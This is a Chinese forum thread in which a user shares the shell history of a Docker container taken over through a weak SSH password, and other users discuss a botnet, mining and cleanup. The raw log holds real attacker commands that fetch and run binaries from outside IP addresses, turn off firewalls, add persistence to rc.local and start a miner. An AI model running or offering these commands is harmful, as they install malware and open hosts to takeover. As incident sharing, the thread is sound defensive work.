V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
suconghou
V2EX  ›  信息安全

docker 容器 ssh 的弱密码被攻破了,看看黑客都干了啥

 •  
 •   suconghou · 2016-12-29 16:55:57 +08:00 · 5152 次点击
  这是一个创建于 2458 天前的主题,其中的信息可能已经有所发展或是发生改变。
  ~ # cat .ash_history 
  service iptables stop
  wget http://211.147.119.195:1611/Linux2.6
  chmod 0755 /root/Linux2.6
  nohup /root/Linux2.6 > /dev/null 2>&1 &
  chmod 777 Linux2.6
  ./Linux2.6
  chmod 0755 /root/Linux2.6
  nohup /root/Linux2.6 > /dev/null 2>&1 &
  chmod 0777 Linux2.6
  chmod u+x Linux2.6
  ./Linux2.6 &
  chmod u+x Linux2.6
  ./Linux2.6 &
  cd /tmp
  service iptables stop
  wget http://211.147.119.195:1611/Linux2.6
  chmod 0755 /root/Linux2.6
  nohup /root/Linux2.6 > /dev/null 2>&1 &
  chmod 777 Linux2.6
  ./164
  chmod 0755 /root/Linux2.6
  nohup /root/Linux2.6 > /dev/null 2>&1 &
  chmod 0777 Linux2.6
  chmod u+x Linux2.6
  ./Linux2.6 &
  chmod u+x dos6cc4
  ./Linux2.6 &
  cd /tmp
  echo "cd /root/">>/etc/rc.local
  echo "./Linux2.6&">>/etc/rc.local
  echo "/etc/init.d/iptables stop">>/etc/rc.local
  /gisdfoewrsfdf
  /bin/busybox cp; /gisdfoewrsfdf
  /bin/busybox mount ;/gisdfoewrsfdf
  /bin/busybox echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm -f /tmp/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox cat /var/tmp/.nippon; /bin/busybox rm -f /var/tmp/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm -f /proc/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm -f /dev/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm -f /dev/pts/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm -f /sys/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; /bin/busybox cat /sys/fs/cgroup/.nippon; /bin/busybox rm -f /sys/fs/cgroup/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; /bin/busybox cat /sys/fs/cgroup/systemd/.nippon; /bin/busybox rm -f /sys/fs/cgroup/systemd/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; /bin/busybox cat /sys/fs/cgroup/cpuset/.nippon; /bin/busybox rm -f /sys/fs/cgroup/cpuset/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; /bin/busybox cat /sys/fs/cgroup/perf_event/.nippon; /bin/busybox rm -f /sys/fs/cgroup/perf_event/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; /bin/busybox cat /sys/fs/cgroup/net_cls/.nippon; /bin/busybox rm -f /sys/fs/cgroup/net_cls/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuacct,cpu' > /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox cat /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox rm -f /sys/fs/cgroup/cpuacct,cpu/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; /bin/busybox cat /sys/fs/cgroup/blkio/.nippon; /bin/busybox rm -f /sys/fs/cgroup/blkio/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; /bin/busybox cat /sys/fs/cgroup/memory/.nippon; /bin/busybox rm -f /sys/fs/cgroup/memory/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; /bin/busybox cat /sys/fs/cgroup/freezer/.nippon; /bin/busybox rm -f /sys/fs/cgroup/freezer/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; /bin/busybox cat /sys/fs/cgroup/devices/.nippon; /bin/busybox rm -f /sys/fs/cgroup/devices/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox cat /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox rm -f /sys/fs/cgroup/hugetlb/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; /bin/busybox cat /dev/mqueue/.nippon; /bin/busybox rm -f /dev/mqueue/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/etc/resolv.conf' > /etc/resolv.conf/.nippon; /bin/busybox cat /etc/resolv.conf/.nippon; /bin/busybox rm -f /etc/resolv.conf/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/etc/hostname' > /etc/hostname/.nippon; /bin/busybox cat /etc/hostname/.nippon; /bin/busybox rm -f /etc/hostname/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/etc/hosts' > /etc/hosts/.nippon; /bin/busybox cat /etc/hosts/.nippon; /bin/busybox rm -f /etc/hosts/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm -f /dev/shm/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/var/lib/mysql' > /var/lib/mysql/.nippon; /bin/busybox cat /var/lib/mysql/.nippon; /bin/busybox rm -f /var/lib/mysql/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/bus' > /proc/bus/.nippon; /bin/busybox cat /proc/bus/.nippon; /bin/busybox rm -f /proc/bus/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/fs' > /proc/fs/.nippon; /bin/busybox cat /proc/fs/.nippon; /bin/busybox rm -f /proc/fs/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/irq' > /proc/irq/.nippon; /bin/busybox cat /proc/irq/.nippon; /bin/busybox rm -f /proc/irq/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/sys' > /proc/sys/.nippon; /bin/busybox cat /proc/sys/.nippon; /bin/busybox rm -f /proc/sys/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/sysrq-trigger' > /proc/sysrq-trigger/.nippon; /bin/busybox cat /proc/sysrq-trigger/.nippon; /bin/busybox rm -f /proc/sysrq-trigger/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/kcore' > /proc/kcore/.nippon; /bin/busybox cat /proc/kcore/.nippon; /bin/busybox rm -f /proc/kcore/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/timer_list' > /proc/timer_list/.nippon; /bin/busybox cat /proc/timer_list/.nippon; /bin/busybox rm -f /proc/timer_list/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/timer_stats' > /proc/timer_stats/.nippon; /bin/busybox cat /proc/timer_stats/.nippon; /bin/busybox rm -f /proc/timer_stats/.nippon
  /bin/busybox echo -e '\x47\x72\x6f\x70/proc/sched_debug' > /proc/sched_debug/.nippon; /bin/busybox cat /proc/sched_debug/.nippon; /bin/busybox rm -f /proc/sched_debug/.nippon
  /gisdfoewrsfdf
  /bin/busybox cat /bin/echo ;/gisdfoewrsfdf
  cd /tmp; /bin/busybox wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; /bin/busybox chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf
  service iptables stop
  wget http://211.147.112.207:1611/Linux2.4
  chmod 0755 /root/Linux2.4
  nohup /root/Linux2.4 > /dev/null 2>&1 &
  chmod 777 Linux2.4
  ./Linux2.4
  chmod 0755 /root/Linux2.4
  nohup /root/Linux2.4 > /dev/null 2>&1 &
  chmod 0777 Linux2.4
  chmod u+x Linux2.4
  ./Linux2.4 &
  chmod u+x Linux2.4
  ./Linux2.4 &
  cd /tmp
  service iptables stop
  wget http://211.147.112.207:1611/Linux2.6
  chmod 0755 /root/Linux2.6
  nohup /root/Linux2.6 > /dev/null 2>&1 &
  chmod 777 Linux2.6
  service iptables stop
  ./164
  wget http://211.147.112.207:1611/Linux2.4
  chmod 0755 /root/Linux2.6
  chmod 0755 /root/Linux2.4
  nohup /root/Linux2.6 > /dev/null 2>&1 &
  nohup /root/Linux2.4 > /dev/null 2>&1 &
  chmod 0777 Linux2.6
  chmod 777 Linux2.4
  chmod u+x Linux2.6
  ./Linux2.4
  ./Linux2.6 &
  chmod 0755 /root/Linux2.4
  chmod u+x dos6cc4
  nohup /root/Linux2.4 > /dev/null 2>&1 &
  ./Linux2.6 &
  chmod 0777 Linux2.4
  cd /tmp
  chmod u+x Linux2.4
  service iptables stop
  ./Linux2.4 &
  wget http://211.147.112.207:1611/dd-wrt
  chmod u+x Linux2.4
  chmod 0755 /root/dd-wrt
  ./Linux2.4 &
  nohup /root/dd-wrt > /dev/null 2>&1 &
  cd /tmp
  chmod 777 dd-wrt
  service iptables stop
  ./dd-wrt
  wget http://211.147.112.207:1611/Linux2.6
  chmod 0755 /root/dd-wrt
  chmod 0755 /root/Linux2.6
  nohup /root/dd-wrt > /dev/null 2>&1 &
  nohup /root/Linux2.6 > /dev/null 2>&1 &
  chmod 0777 dd-wrt
  chmod 777 Linux2.6
  chmod u+x dd-wrt
  ./164
  ./dd-wrt &
  chmod 0755 /root/Linux2.6
  chmod u+x dd-wrt
  nohup /root/Linux2.6 > /dev/null 2>&1 &
  ./dd-wrt &
  chmod 0777 Linux2.6
  cd /tmp
  chmod u+x Linux2.6
  service iptables stop
  ./Linux2.6 &
  wget http://211.147.112.207:1611/linux-arm
  chmod u+x dos6cc4
  chmod 0755 /root/linux-arm
  ./Linux2.6 &
  nohup /root/linux-arm > /dev/null 2>&1 &
  cd /tmp
  chmod 777 linux-arm
  service iptables stop
  ./linux-arm
  wget http://211.147.112.207:1611/dd-wrt
  chmod 0755 /root/linux-arm
  nohup /root/linux-arm > /dev/null 2>&1 &
  chmod 0777 linux-arm
  chmod u+x linux-arm
  chmod 0755 /root/dd-wrt
  nohup /root/dd-wrt > /dev/null 2>&1 &
  chmod 777 dd-wrt
  ./dd-wrt
  ./linux-arm &
  chmod 0755 /root/dd-wrt
  chmod u+x linux-arm
  nohup /root/dd-wrt > /dev/null 2>&1 &
  ./linux-arm &
  chmod 0777 dd-wrt
  cd /tmp
  chmod u+x dd-wrt
  service iptables stop
  ./dd-wrt &
  wget http://211.147.112.207:1611/linux-mips
  chmod u+x dd-wrt
  ./dd-wrt &
  chmod 0755 /root/linux-mips
  nohup /root/linux-mips > /dev/null 2>&1 &
  cd /tmp
  chmod 777 linux-mips
  service iptables stop
  ./linux-mips
  wget http://211.147.112.207:1611/linux-arm
  chmod 0755 /root/linux-mips
  chmod 0755 /root/linux-arm
  nohup /root/linux-mips > /dev/null 2>&1 &
  nohup /root/linux-arm > /dev/null 2>&1 &
  chmod 0777 linux-mips
  chmod 777 linux-arm
  chmod u+x linux-mips
  ./linux-arm
  ./linux-mips &
  chmod 0755 /root/linux-arm
  chmod u+x linux-mips
  nohup /root/linux-arm > /dev/null 2>&1 &
  ./linux-mips &
  chmod 0777 linux-arm
  cd /tmp
  chmod u+x linux-arm
  service iptables stop
  ./linux-arm &
  wget http://211.147.112.207:1611/taskhost.exe
  chmod u+x linux-arm
  chmod 0755 /root/taskhost.exe
  ./linux-arm &
  nohup /root/taskhost.exe > /dev/null 2>&1 &
  cd /tmp
  chmod 777 taskhost.exe
  service iptables stop
  ./taskhost.exe
  wget http://211.147.112.207:1611/linux-mips
  chmod 0755 /root/taskhost.exe
  chmod 0755 /root/linux-mips
  nohup /root/taskhost.exe > /dev/null 2>&1 &
  nohup /root/linux-mips > /dev/null 2>&1 &
  chmod 0777 taskhost.exe
  chmod 777 linux-mips
  chmod u+x taskhost.exe
  ./linux-mips
  ./taskhost.exe &
  chmod 0755 /root/linux-mips
  chmod u+x taskhost.exe
  nohup /root/linux-mips > /dev/null 2>&1 &
  ./taskhost.exe &
  chmod 0777 linux-mips
  chmod u+x linux-mips
  cd /tmp
  ./linux-mips &
  echo "cd /root/">>/etc/rc.local
  chmod u+x linux-mips
  echo "./Linux2.4&">>/etc/rc.local
  ./linux-mips &
  echo "./Linux2.6&">>/etc/rc.local
  cd /tmp
  echo "./dd-wrt&">>/etc/rc.local
  service iptables stop
  echo "./linux-arm&">>/etc/rc.local
  wget http://211.147.112.207:1611/taskhost.exe
  echo "./linux-mips&">>/etc/rc.local
  chmod 0755 /root/taskhost.exe
  echo "./taskhost&">>/etc/rc.local
  nohup /root/taskhost.exe > /dev/null 2>&1 &
  echo "/etc/init.d/iptables stop">>/etc/rc.local
  chmod 777 taskhost.exe
  ./taskhost.exe
  chmod 0755 /root/taskhost.exe
  nohup /root/taskhost.exe > /dev/null 2>&1 &
  chmod 0777 taskhost.exe
  chmod u+x taskhost.exe
  ./taskhost.exe &
  chmod u+x taskhost.exe
  ./taskhost.exe &
  cd /tmp
  echo "cd /root/">>/etc/rc.local
  echo "./Linux2.4&">>/etc/rc.local
  echo "./Linux2.6&">>/etc/rc.local
  echo "./dd-wrt&">>/etc/rc.local
  echo "./linux-arm&">>/etc/rc.local
  echo "./linux-mips&">>/etc/rc.local
  echo "./taskhost&">>/etc/rc.local
  echo "/etc/init.d/iptables stop">>/etc/rc.local
  /etc/init.d/iptables stop
  service iptables stop
  SuSEfirewall2 stop
  reSuSEfirewall2 stop
  cd /tmp
  wget http://115.236.92.99:12345/bins.sh
  chmod 777 bins.sh
  ./bins.sh
  /etc/init.d/iptables stop
  service iptables stop
  SuSEfirewall2 stop
  reSuSEfirewall2 stop
  cd /tmp
  wget http://115.236.92.99:12345/marlin
  /etc/init.d/iptables stop
  service iptables stop
  SuSEfirewall2 stop
  reSuSEfirewall2 stop
  CD /tmp
  wget http://115.236.92.99:8846/2500
  chmod 777 2500
  ./2500 >/dev/null 2>&1 &
  /etc/init.d/iptables stop
  service iptables stop
  SuSEfirewall2 stop
  reSuSEfirewall2 stop
  CD /tmp
  wget http://115.236.92.99:12345/2500
  chmod 777 2500
  ./2500 >/dev/null 2>&1 &
  /etc/init.d/iptables stop
  service iptables stop
  SuSEfirewall2 stop
  reSuSEfirewall2 stop
  cd /tmp
  wget http://115.236.92.99:12345/marlin
  chmod 777 marlin
  ./marlin -u 55489a27a09840cc82aec8c48858d30ec184344b162fb99e904f41e860a4dfad53db10d7b3f7.AK1 -I 20
  
  12 条回复    2017-01-19 00:35:00 +08:00
  suconghou
      1
  suconghou  
  OP
     2016-12-29 17:08:31 +08:00
  /etc/init.d # ls
  DbSecuritySpt QsystemsshMmt VsystemsshMdt mariadb rc.local selinux
  /etc/init.d # rm *t
  /etc/init.d # ls
  mariadb rc.local selinux
  /etc/init.d # cat selinux
  #!/bin/bash
  /usr/bin/bsd-port/getty
  /etc/init.d # ls -lh /usr/bin/bsd-port/getty
  -rwxr-xr-x 1 root root 1.2M Dec 17 15:49 /usr/bin/bsd-port/getty
  /etc/init.d # md5sum /usr/bin/bsd-port/getty
  2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/bsd-port/getty
  /etc/init.d # md5sum /bin/ps
  2dafa3cb07d8e13ae9bf9136ed97403c /bin/ps
  /etc/init.d # md5sum /bin/netstat
  2dafa3cb07d8e13ae9bf9136ed97403c /bin/netstat
  /etc/init.d # md5sum /usr/bin/lsof
  2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/lsof
  /etc/init.d #


  都是这个 2dafa
  swulling
      2
  swulling  
     2016-12-29 17:12:24 +08:00
  这个不叫『黑客』,这个叫『脚本小子』
  ryd994
      3
  ryd994  
     2016-12-29 17:12:50 +08:00 via Android
  一般不建议用 docker 做蜜罐,因为如果对方看出来的话,想打穿还是有可能的
  suconghou
      4
  suconghou  
  OP
     2016-12-29 17:19:36 +08:00
  无意间成了蜜罐 已停用 ssh
  megatron
      5
  megatron  
     2016-12-29 17:52:53 +08:00
  这是照着教材来的?
  说个好玩儿的,前两天一个测试机被入侵了,入侵者竟然帮我升级了 jdk ,我想了半天也不知道为什么。
  xss
      6
  xss  
     2016-12-29 18:18:04 +08:00
  这个是自动化脚本干的, 并不是人进行的操作.
  应该是僵尸网络中的节点在找更多的节点, 加入僵尸网络.
  suconghou
      7
  suconghou  
  OP
     2016-12-29 18:42:45 +08:00
  查了一下 可能是透过 redis 入侵的, cron 文件都被改了,redis 我开着外网端口来着.
  tanszhe
      8
  tanszhe  
     2016-12-29 19:02:45 +08:00
  干什么了什么啊?求大神解释一下这段代码干了什么?
  dant
      9
  dant  
     2016-12-29 23:51:20 +08:00
  挖矿吧
  maxwel1
      10
  maxwel1  
     2017-01-11 13:49:13 +08:00
  测试用的 centos ,还在调试,然后过了个周末发现被执行了上面那个脚本,如果不重装的话,怎么清理干净呢?有什么办法吗?
  suconghou
      11
  suconghou  
  OP
     2017-01-11 14:02:23 +08:00
  @maxwel1 建议备份重装 ps lsof netstat 还有开机启动项,动态链接库,很多都被替换了.
  maxwel1
      12
  maxwel1  
     2017-01-19 00:35:00 +08:00
  @suconghou 多谢,看来只好重装了,最近这两周没空搞它,直接关机了。。
  关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   2481 人在线   最高记录 5930   ·     Select Language
  创意工作者们的社区
  World is powered by solitude
  VERSION: 3.9.8.5 · 31ms · UTC 04:43 · PVG 12:43 · LAX 21:43 · JFK 00:43
  Developed with CodeLauncher
  ♥ Do have faith in what you're doing.